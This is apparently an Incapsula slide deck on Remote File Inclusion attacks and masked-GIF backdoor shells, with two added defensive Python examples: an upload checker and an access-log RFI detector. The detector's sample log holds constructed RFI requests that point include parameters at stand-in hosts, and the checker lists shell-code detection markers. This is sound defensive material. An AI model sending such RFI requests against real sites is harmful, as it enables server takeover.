We are introducing new security algorithms to further improve our Remote File Inclusion (RFI) protective measures.
These new security features leverage Incapsula's native crowdsourcing capabilities to gain intelligence about Backdoor shells, RFI attack patterns and zero-day threats.
Our reputation-based algorithms are built on security research covering billions of web sessions over a 6-month period.
This research yielded some interesting facts about RFI attacks, which we documented for the benefit of whitehats, developers and website owners.
Where Remote File Inclusion (RFI) Attacks Fall in the Security Threat Landscape
1. RFI Attacks in the Security Landscape
Incapsula: Website Security and Acceleration
2. Methodology
• The following facts and figures are based on data from billions of sessions, which were managed by Incapsula’s CDN, over a 6-month period.
• Session data was collected and analyzed by Incapsula’s proprietary traffic profiling security algorithms.
• Link lifespan information is based on sampled data from a group of 1,000 RFI links, which carry 226 different types of backdoor shells and shell variants.
• All data was aggregated from Incapsula’s crowd-sourced database, dedicated to ongoing research of RFI attacks and backdoor shell behavior.
3. Attack Description
Remote File Inclusion (RFI) attacks abuse user-input and file-validation vulnerabilities to upload a malicious payload from a remote location.
The payload is typically a backdoor shell; with it, the attacker's goal is to circumvent all security measures by gaining high-privileged access to website, web application and web hosting server controls.
4. • RFI attacks are popular for their ease of automation and high damage potential.
• RFI circumvents other security measures, offering the best ROI for an attacker.
• RFI attacks are executed via widely available automated tools.
5. • Many websites still carry known/patched RFI vulnerabilities.
• Patching is not an effective wide-scale solution.
• Compromised websites are hijacked for malware distribution and DDoS attacks.
• A compromised site is a persistent threat to itself, its visitors and other websites.
6. • RFI links serve as centralized distributors of backdoor shells.
• Many RFI links are re-used for multiple attacks, with different attack vectors, on various targets.
• The lifespan of RFI links averages over 60 days, making them great candidates for long-term intelligence gathering.
7. • High-visibility RFI attacks will result in defacement or manipulation of content.
• The attacker will often prefer a more subtle approach, using the compromised site as a long-term resource for DDoS, data theft and malware distribution.
• One compromised site can endanger the whole server!
8. • Masked GIF files are the “backdoor of choice” for RFI attacks.
• The popularity of GIF masking follows the popularity of the TimThumb vulnerability.
• GIFs are used to mask large shells and droppers alike.
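The "masked GIF" point above is worth a concrete upload-side check. The following is an added example, not Incapsula's code: it verifies that a file presented as a GIF actually starts with a GIF header and then scans the whole body for script markers that have no business inside image data. The sample files are constructed; the marker list and the `classify_upload` verdict strings are this example's own choices.

```python
"""Detect masked GIFs: files with a valid GIF header that carry script code.

Added example (not part of the original page). Inputs below are constructed.
"""
import re

GIF_MAGIC = (b"GIF87a", b"GIF89a")

# Markers that should never appear in genuine image data. A file that passes
# the header check but contains one of these is a polyglot / masked script.
SCRIPT_MARKERS = [
    re.compile(rb"<\?php", re.I),
    re.compile(rb"<\?=", re.I),
    re.compile(rb"<script\b", re.I),
    re.compile(rb"\beval\s*\(", re.I),
    re.compile(rb"\bbase64_decode\s*\(", re.I),
    re.compile(rb"\bsystem\s*\(", re.I),
]

# Constructed sample: a genuine 1x1 transparent GIF89a.
REAL_GIF = (
    b"GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\xff\xff\xff"
    b"\x21\xf9\x04\x01\x00\x00\x00\x00\x2c\x00\x00\x00\x00\x01\x00\x01\x00"
    b"\x00\x02\x02\x44\x01\x00\x3b"
)

# Constructed sample: valid GIF header followed by a PHP block. The body is a
# harmless placeholder standing in for the shell code a real masked GIF carries.
MASKED_GIF = b"GIF89a\x01\x00\x01\x00<?php /* constructed masked-script stand-in */ ?>"


def has_gif_header(data: bytes) -> bool:
    """True if the first six bytes are a GIF87a/GIF89a signature."""
    return data[:6] in GIF_MAGIC


def find_script_markers(data: bytes) -> list:
    """Return the patterns (as text) of every script marker found in the file."""
    return [p.pattern.decode() for p in SCRIPT_MARKERS if p.search(data)]


def classify_upload(data: bytes) -> str:
    """Verdict for an upload claiming to be a GIF.

    'reject:not-gif'        -> header check failed
    'reject:masked-script'  -> header OK but script markers present
    'accept'                -> header OK and no markers found
    """
    if not has_gif_header(data):
        return "reject:not-gif"
    if find_script_markers(data):
        return "reject:masked-script"
    return "accept"


if __name__ == "__main__":
    for label, blob in (("real", REAL_GIF), ("masked", MASKED_GIF)):
        print(label, classify_upload(blob), find_script_markers(blob))
```

The marker scan is a heuristic: it catches the plain-text PHP that the page describes being hidden behind a GIF header, but obfuscated payloads can evade it. The stronger mitigation is to decode the upload with an image library and re-encode it, so that only pixel data survives, and to never hand user-controlled paths or URLs to an include or fetch routine in the first place.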
9. Conclusions
• Signature-based methods are effective against most RFIs but not against zero-day threats.
• Patching is not an effective wide-scale solution.
• RFI links’ lifespan, and their position as centralized distribution points, offer many benefits for whitehats.
• Data from RFI links can be harvested for reputation-based algorithms, to harden RFI and backdoor protection.
• Data from RFI links can be used as a backbone for an effective early warning system for unique zero-day threats.
• Incapsula’s native crowdsourcing functionalities, coupled with its access control capabilities, are extremely well-suited for RFI link monitoring and reputation-based mitigation.
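Slides 3 and 6 describe the attack shape (a request parameter pointing at a remote payload) and the reuse and long lifespan of RFI links, and the conclusions propose harvesting those links for reputation data. The following added example, not Incapsula's code, shows what that looks like on a single site's access log: it flags requests whose query values are absolute URLs, then aggregates them per RFI link into first-seen, last-seen, hit count, attacking sources and the local scripts targeted. The log lines are constructed (documentation IP ranges and `.example` hosts); the combined-log regex and the reputation record layout are this example's own.

```python
"""Flag RFI attempts in access logs and build a per-link reputation table.

Added example (not part of the original page). Sample log lines are constructed.
"""
import re
from datetime import datetime
from urllib.parse import urlsplit, parse_qsl

# Combined log format, trimmed to the fields this example needs.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# A query value that is itself an absolute URL is the tell-tale of an RFI
# attempt: the application is being asked to include a remote resource.
REMOTE_RE = re.compile(r"^(?:https?|ftps?)://", re.I)

# Constructed sample log: one normal request, three RFI attempts, two of which
# reuse the same remote link against different local scripts two days apart.
SAMPLE_LOG = """\
203.0.113.5 - - [01/Jun/2013:10:01:02 +0000] "GET /index.php?page=about HTTP/1.1" 200 512
203.0.113.5 - - [01/Jun/2013:10:01:09 +0000] "GET /index.php?page=http://rfi.example/s.gif? HTTP/1.1" 200 2048
198.51.100.7 - - [03/Jun/2013:11:45:00 +0000] "GET /wp-content/themes/x/timthumb.php?src=http%3A%2F%2Frfi.example%2Fs.gif HTTP/1.1" 200 100
198.51.100.7 - - [03/Jun/2013:11:45:01 +0000] "GET /index.php?page=ftp://other.example/a.txt HTTP/1.1" 500 0
"""


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec


def remote_params(target):
    """Yield (param_name, normalized_url) for each query value that is a remote URL."""
    parts = urlsplit(target)
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if REMOTE_RE.match(value):
            # A trailing '?' is commonly appended so the rest of the include
            # path is treated as a query string; strip it to unify the link.
            yield name, value.rstrip("?")


def scan_log(text):
    """Return one event per (request, remote-URL parameter) pair found."""
    events = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for name, url in remote_params(rec["target"]):
            events.append({
                "ts": rec["ts"], "src": rec["src"], "status": rec["status"],
                "script": urlsplit(rec["target"]).path, "param": name, "rfi_url": url,
            })
    return events


def build_reputation(events):
    """Aggregate events per RFI link: lifespan bounds, volume, sources, targets."""
    rep = {}
    for ev in events:
        e = rep.setdefault(ev["rfi_url"], {
            "first_seen": ev["ts"], "last_seen": ev["ts"], "hits": 0,
            "sources": set(), "scripts": set(),
        })
        e["first_seen"] = min(e["first_seen"], ev["ts"])
        e["last_seen"] = max(e["last_seen"], ev["ts"])
        e["hits"] += 1
        e["sources"].add(ev["src"])
        e["scripts"].add(ev["script"])
    return rep


def lifespan_days(entry):
    """Observed lifespan of a link on this site, in whole days."""
    return (entry["last_seen"] - entry["first_seen"]).days


if __name__ == "__main__":
    for url, entry in build_reputation(scan_log(SAMPLE_LOG)).items():
        print(url, entry["hits"], lifespan_days(entry), sorted(entry["scripts"]))
```

On one site this table only shows local reuse; the crowdsourcing point in the conclusions is that merging such tables across many sites is what turns a link first seen on one victim into a block-list entry for all the others before the payload behind it has a signature. Note that the detector keys on request shape, not on the response: a 500 on the last sample line does not mean the attempt was harmless, so every hit is recorded regardless of status.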
10. Learn More
For more information about RFI attacks and Incapsula’s unique crowdsourcing security visit:
• http://www.Incapsula.com
• http://www.incapsula.com/the-incapsula-blog/item/801-crowdsourced-security-rfi-protection
• http://www.incapsula.com/the-incapsula-blog/item/802-rfi-attacks-in-the-security-threat-landscape
or contact us at: Info@Incapsula.com